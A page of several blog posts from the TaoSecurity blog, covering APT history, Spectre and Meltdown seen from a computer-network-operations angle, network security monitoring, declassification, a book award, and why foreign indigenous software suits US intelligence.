Sunday, January 14, 2018

Remembering When APT Became Public

Last week I Tweeted the following on the 8th anniversary of Google's blog post about its compromise by Chinese threat actors:

This intrusion made the term APT mainstream. I was the first to associate it with Aurora, in this post 

https://taosecurity.blogspot.com/2010/01/google-v-china.html

My first APT post was a careful reference in 2007, when we all feared being accused of "leaking classified" re China: 

https://taosecurity.blogspot.com/2007/10/air-force-cyberspace-report.html

I should have added the term "publicly" to my original Tweet. There were consultants with years of APT experience involved in the Google incident response, and they recognized the work of APT17 at that company and others. Those consultants honored their NDAs and have stayed quiet.

I wrote my original Tweet as a reminder that "APT" was not a popular, recognized term until the Google announcement on 12 January 2010. In my Google v China blog post I wrote:

Welcome to the party, Google. You can use the term "advanced persistent threat" (APT) if you want to give this adversary its proper name.

I also Tweeted a similar statement on the same day:

This is horrifying: http://bit.ly/7x7vVW Google admits intellectual property theft from China; it's called Advanced Persistent Threat, GOOG

I made the explicit link of China and APT because no one had done that publicly.

This slide from a 2011 briefing I did in Hawaii captures a few historical points:


The Google incident was a watershed, for reasons I blogged on 16 January 2010. I remember the SANS DFIR 2008 event as effectively "APTCon," but beyond Mandiant, Northrup Grumman, and NetWitness, no one was really talking publicly about the APT until after Google.

As I noted in the July 2009 blog post, You Down With APT? (ugh):

Aside from Northrup Grumman, Mandiant, and a few vendors (like NetWitness, one of the full capture vendors out there) mentioning APT, there's not much else available. A Google search for "advanced persistent threat" -netwitness -mandiant -Northrop yields 34 results (prior to this blog post). (emphasis added)

Today that search yields 244,000 results.

I would argue we're "past APT." APT was the buzzword for RSA and other vendor-centric events from, say, 2011-2015, with 2013 being the peak following Mandiant's APT1 report.

The threat hasn't disappeared, but it has changed. I wrote my Tweet to mark a milestone and to note that I played a small part in it.

All my APT posts here are reachable by this APT tag. Also see my 2010 article for Information Security Magazine titled What APT Is, and What It Isn't.

Monday, January 08, 2018

Happy 15th Birthday TaoSecurity Blog

Today, 8 January 2018, is the 15th birthday of TaoSecurity Blog! This is also my 3,020th blog post.

I wrote my first post on 8 January 2003 while working as an incident response consultant for Foundstone.

I don't believe I've released statistics for the blog before, so here are a few. Blogger started providing statistics in May 2010, so these apply to roughly the past 8 years only!

As of today, since May 2010 the blog has nearly 7.7 million all time page views.

Here are the most popular posts as of today:


Twitter continues to play a role in the way I communicate. When I last reported on a blog birthday two years ago, I said that I had nearly 36,000 Twitter followers for @taosecurity, with roughly 16,000 Tweets. Today I have nearly 49,000 followers with less than 18,000 Tweets. As with most people on social media, blogging has taken a back seat to more instant forms of communication.

These days I am active on Instagram as @taosecurity as well. That account is a departure from my social media practice. On Twitter I have separate accounts for cybersecurity and intelligence (@taosecurity), martial arts (@rejoiningthetao), and other purposes. My Instagram @taosecurity account is a unified account, meaning I talk about whatever I feel like. 

During the last two years I also started another blog to which I regularly contribute -- Rejoining the Tao. I write about my martial arts journey there, usually once a week.

Once in a while I post to LinkedIn, but it's usually news of a blog post like this, or other LinkedIn content of interest.

What's ahead? You may remember I was working on a PhD and I had left FireEye. I decided to abandon my PhD in the fall of 2016. I realized I was not an academic, although I had written four books.

I have also changed all the goals I named in my post-FireEye announcement.

For the last year I have been doing limited security consulting, but that has been increasing in recent months. I continue to be involved in martial arts, but I no longer plan to be a Krav Maga instructor nor to open my own school.

For several months I've been working with a co-author and subject matter expert on a new book with martial arts applicability. I've been responsible for editing and publishing. I'll say more about that at Rejoining the Tao when the time is right.

Thank you to everyone who has been part of this blog's journey since 2003!

Friday, January 05, 2018

Spectre and Meltdown from a CNO Perspective

Longtime readers know that I have no problem with foreign countries replacing American vendors with local alternatives. For example, see Five Reasons I Want China Running Its Own Software. This is not a universal principle, but as an American I am fine with it. Putting my computer network operations (CNO) hat on, I want to share a few thoughts about the intersection of the anti-American vendor mindset with the recent Spectre and Meltdown attacks.

There are probably non-Americans, who, for a variety of reasons, feel that it would be "safer" for them to run their cloud computing workloads on non-American infrastructure. Perhaps they feel that it puts their data beyond the reach of the American Department of Justice. (I personally feel that it's an over-reach by DoJ to try to access data beyond American borders, eg Microsoft Corp. v. United States.)

The American intelligence community and computer network operators, however, might prefer to have that data outside American borders. These agencies are still bound by American laws, but those laws generally permit exploitation overseas.

Now put this situation in the context of Spectre and Meltdown. Begin with the attack scenario mentioned by Nicole Perlroth, where an attacker rents a few minutes of time on various cloud systems, then leverages Spectre and/or Meltdown to try to gather sensitive data from other virtual machines on the same physical hardware.

No lawyer or judge would allow this sort of attack scenario if it were performed in American systems. It would be very difficult, I think, to minimize data in this kind of "fishing expedition." Most of the data returned would belong to US persons and would be subject to protection. Sure, there are conspiracy theorists out there who will never trust that the US government follows its own laws. These people are sure that the USG already knew about Spectre and Meltdown and ravaged every American cloud system already, after doing the same with the "Intel Management Engine backdoors."

In reality, US law will prevent computer network operators from running these sorts of missions on US cloud infrastructure. Overseas, it's a different story. Non US-persons do not enjoy the same sorts of privacy protections as US persons. Therefore, the more "domestic" (non-American) the foreign target, the better. For example, if the IC identified a purely Russian cloud provider, it would not be difficult for the USG to authorize a Spectre-Meltdown collection operation against that target.

I have no idea if this is happening, but this was one of my first thoughts when I first heard about this new attack vector.

Bonus: it's popular to criticize academics who research cybersecurity. They don't seem to find much that is interesting or relevant. However, academics played a big role in discovering Spectre and Meltdown. Wow!

Monday, December 04, 2017

On "Advanced" Network Security Monitoring

My TaoSecurity News page says I taught 41 classes lasting a day or more, from 2002 to 2014. All of these involved some aspect of network security monitoring (NSM). Many times students would ask me when I would create the "advanced" version of the class, usually in the course feedback. I could never answer them, so I decided to do so in this blog post.

The short answer is this: at some point, advanced NSM is no longer NSM. If you consider my collection - analysis - escalation - response model, NSM extensions from any of those phases quickly have little or nothing to do with the network.

Here are a few questions I have received concerned "advanced NSM," paired with the answers I could have provided.

Q: "I used NSM to extract a binary from network traffic. What do I do with this binary?"

A: "Learn about reverse engineering and binary analysis."

Or:

Q: "I used NSM to extra Javascript from a malicious Web page. What do I do with this Javascript?"

A: "Learn about Javascript de-obfuscation and programming."

Or:

Q: "I used NSM to capture an exchange between a Windows client and a server. What does it mean?"

A: "Learn about Server Message Block (SMB) or Common Internet File System (CIFS)."

Or:

Q: "I used NSM to capture cryptographic material exchanged between a client and a server. How do I understand it?"

A: "Learn about cryptography."

Or:

Q: "I used NSM to grab shell code passed with an exploit against an Internet-exposed service. How do I tell what it does?"

A: "Learn about programming in assembly."

Or:

Q: "I want to design custom hardware for packet capture. How do I do that?"

A: "Learn about programming ASICs (application specific integrated circuits)."

I realized that I had the components of all of this "advanced NSM" material in my library. I had books on reverse engineering and binary analysis, Javascript, SMB/CIFS, cryptography, assembly programming, ASICs, etc.

The point is that eventually the NSM road takes you to other aspects of the cyber security landscape.

Are there *any* advanced area for NSM? One could argue that protocol analysis, as one finds in tools like Bro, Suricata, Snort, Wireshark, and so on constitute advanced NSM. However, you could just as easily argue that protocol analysis becomes more about understanding the programming and standards behind each of the protocols.

In brief, to learn advanced NSM, expand beyond NSM.

Saturday, October 21, 2017

How to Minimize Leaking

I am hopeful that President Trump will not block release of the remaining classified documents addressing the 1963 assassination of President John F. Kennedy. I grew up a Roman Catholic in Massachusetts, so President Kennedy always fascinated me.

The 1991 Oliver Stone movie JFK fueled several years of hobbyist research into the assassination. (It's unfortunate the movie was so loaded with fictional content!) On the 30th anniversary of JFK's death in 1993, I led a moment of silence from the balcony of the Air Force Academy chow hall during noon meal. While stationed at Goodfellow AFB in Texas, Mrs B and I visited Dealey Plaza in Dallas and the Sixth Floor Museum.

Many years later, thanks to a 1992 law partially inspired by the Stone movie, the government has a chance to release the last classified assassination records. As a historian and former member of the intelligence community, I hope all of the documents become public. This would be a small but significant step towards minimizing the culture of information leaking in Washington, DC. If prospective leakers were part of a system that was known for releasing classified information prudently, regularly, and efficiently, it would decrease the leakers' motivation to evade the formal declassification process.

Many smart people have recommended improvements to the classification system. Check out this 2012 report for details.

Monday, May 08, 2017

Latest Book Inducted into Cybersecurity Canon

Thursday evening Mrs B and I were pleased to attend an awards seminar for the Cybersecurity Canon. This is a project sponsored by Palo Alto Networks and led by Rick Howard. The goal is "identify a list of must-read books for all cybersecurity practitioners."

Rick reviewed my fourth book The Practice of Network Security Monitoring in 2014 and someone nominated it for consideration in 2016. I was unaware earlier this year that my book was part of a 32-title "March Madness" style competition. My book won the five rounds, resulting in its conclusion in the 2017 inductee list! Thank you to all those that voted for my book.

Ben Rothke awarded me the Canon trophy.
Ben Rothke interviewed me prior to the induction ceremony. We discussed some current trends in security and some lessons from the book. I hope to see that interviewed published by Palo Alto Networks and/or the Cybersecurity canon project in the near future.

In my acceptance speech I explained how I wrote the book because I had not yet dedicated a book to my youngest daughter, since she was born after my third book was published.

A teaching moment at Black Hat Abu Dhabi in December 2012 inspired me to write the book. While teaching network security monitoring, one of the students asked "but where do I install the .exe on the server?"

I realized this student had no idea of physical access to a wire, or using a system to collect and store network traffic, or any of the other fundamental concepts inherent to NSM. He thought NSM was another magical software package to install on his domain controller.

Four foreign language editions.
Thanks to the interpretation assistance of a local Arabic speaker, I was able to get through to him. However, the experience convinced me that I needed to write a new book that built NSM from the ground up, hence the selection of topics and the order in which I presented them.

While my book has not (yet?) been translated into Arabic, there are two Chinese language editions, a Korean edition, and a Polish edition! I also know of several SOCs who provide a copy of the book to all incoming analysts. The book is also a text in several college courses.

I believe the book remains relevant for anyone who wants to learn the NSM methodology to detect and respond to intrusions. While network traffic is the example data source used in the book, the NSM methodology is data source agnostic.

In 2002 Bamm Visscher and I defined NSM as "the collection, analysis, and escalation of indications and warnings to detect and respond to intrusions." This definition makes no reference to network traffic.

It is the collection-analysis-escalation framework that matters. You could perform NSM using log files, or host-centric data, or whatever else you use for indications and warning.

I have no plans for another cybersecurity book. I am currently editing a book about combat mindset written by the head instructor of my Krav Maga style and his colleague.
Thanks for asking for an autograph!

Palo Alto hosted a book signing and offered free books for attendees. I got a chance to speak with Steven Levy, whose book Hackers was also inducted. I sat next to him during the book signing, as shown in the picture at right.

Thank you to Palo Alto Networks, Rick Howard, Ben Rothke, and my family for making inclusion in the Cybersecurity Canon possible. The awards dinner was a top-notch event. Mrs B and I enjoyed meeting a variety of people, including students in local cybersecurity degree programs.

I closed my acceptance speech with the following from the end of the Old Testament, at the very end of 2nd Maccabees. It captures my goal when writing books:

"So I too will here end my story. If it is well told and to the point, that is what I myself desired; if it is poorly done and mediocre, that was the best I could do."

If you'd like a copy of The Practice of Network Security Monitoring the best deal is to buy print and electronic editions from the publisher's Web site. Use code NSM101 to save 30%. I like having the print version for easy review, and I carry the digital copy on my tablet and phone.

Thank you to everyone who voted and who also bought a copy of my book!

Update: I forgot to thank Doug Burks, who created Security Onion, the software used to demonstrate NSM in the book. Doug also contributed the appendix explaining certain SO commands. Thank you Doug! Also thank you to Bill Pollack and his team at No Starch Press, who edited and published the book!

Thursday, March 23, 2017

Five Reasons I Want China Running Its Own Software

Periodically I read about efforts by China, or Russia, or North Korea, or other countries to replace American software with indigenous or semi-indigenous alternatives. I then reply via Twitter that I love the idea, with a short reason why. This post will list the top five reasons why I want China and other likely targets of American foreign intelligence collection to run their own software.

1. Many (most?) non-US software companies write lousy code. The US is by no means perfect, but our developers and processes generally appear to be superior to foreign indigenous efforts. Cisco vs Huawei is a good example. Cisco has plenty of problems, but it has processes in place to manage them, plus secure code development practices. Lousy indigenous code means it is easier for American intelligence agencies to penetrate foreign targets. (An example of a foreign country that excels in writing code is Israel, but thankfully it is not the same sort of priority target like China, Russia, or North Korea.)

2. Many (most?) non-US enterprises are 5-10 years behind US security practices. Even if a foreign target runs decent native code, the IT processes maintaining that code are lagging compared to American counterparts. Again, the US has not solved this problem by any stretch of the imagination. However, relatively speaking, American inventory management, patch management, and security operations have the edge over foreign intelligence targets. Because non-US enterprises running indigenous code will not necessarily be able to benefit from American expertise (as they might if they were running American code), these deficiencies will make them easier targets for foreign exploitation.

3. Foreign targets running foreign code is win-win for American intel and enterprises. The current vulnerability equities process (VEP) puts American intelligence agencies in a quandary. The IC develops a zero-day exploit for a vulnerability, say for use against Cisco routers. American and Chinese organizations use Cisco routers. Should the IC sit on the vulnerability in order to maintain access to foreign targets, or should it release the vulnerability to Cisco to enable patching and thereby protect American and foreign systems?

This dilemma disappears in a world where foreign targets run indigenous software. If the IC identifies a vulnerability in Cisco software, and the majority of its targets run non-Cisco software, then the IC is more likely (or should be pushed to be more likely) to assist with patching the vulnerable software. Meanwhile, the IC continues to exploit Huawei or other products at its leisure.

4. Writing and running indigenous code is the fastest way to improve. When foreign countries essentially outsource their IT to vendors, they become program managers. They lose or never develop any ability to write and run quality software. Writing and running your own code will enroll foreign organizations in the security school of hard knocks. American intel will have a field day for 3-5 years against these targets, as they flail around in a perpetual state of compromise. However, if they devote the proper native resources and attention, they will learn from their mistakes. They will write and run better software. Now, this means they will become harder targets for American intel, but American intel will retain the advantage of point 3.

5. Trustworthy indigenous code will promote international stability. Countries like China feel especially vulnerable to American exploitation. They have every reason to be scared. They run code written by other organizations. They don't patch it or manage it well. Their security operations stink. The American intel community could initiate a complete moratorium on hacking China, and the Chinese would still be ravaged by other countries or criminal hackers, all the while likely blaming American intel. They would not be able to assess the situation. This makes for a very unstable situation.

Therefore, countries like China and others are going down the indigenous software path. They understand that software, not oil as Daniel Yergen once wrote, is now the "commanding heights" of the economy. Pursuing this course will subject these countries to many years of pain. However, in the end I believe it will yield a more stable situation. These countries should begin to perceive that they are less vulnerable. They will experience their own vulnerability equity process. They will be more aware and less paranoid.

In this respect, indigenous software is a win for global politics. The losers, of course, are global software companies. Foreign countries will continue to make short-term deals to suck intellectual property and expertise from American software companies, before discarding them on the side of Al Gore's information highway.

One final point -- a way foreign companies could jump-start their indigenous efforts would be to leverage open source software. I doubt they would necessarily honor licenses which require sharing improvements with the open source community. However, open source would give foreign organizations the visibility they need and access to expertise that they lack. Microsoft's shared source and similar programs were a step in this direction, but I suggest foreign organizations adopt open source instead.

Now, widespread open source adoption by foreign intelligence targets would erode the advantages for American intel that I explained in point 3. I'm betting that foreign leaders are likely similar to Americans in that they tend to not trust open source, and prefer to roll their own and hold vendors accountable. Therefore I'm not that worried, from an American intel perspective, about point 3 being vastly eroded by widespread foreign open source adoption.

TeePublic is running a sale until midnight ET Thursday! Get a TaoSecurity Milnet T-shirt for yourself and a friend!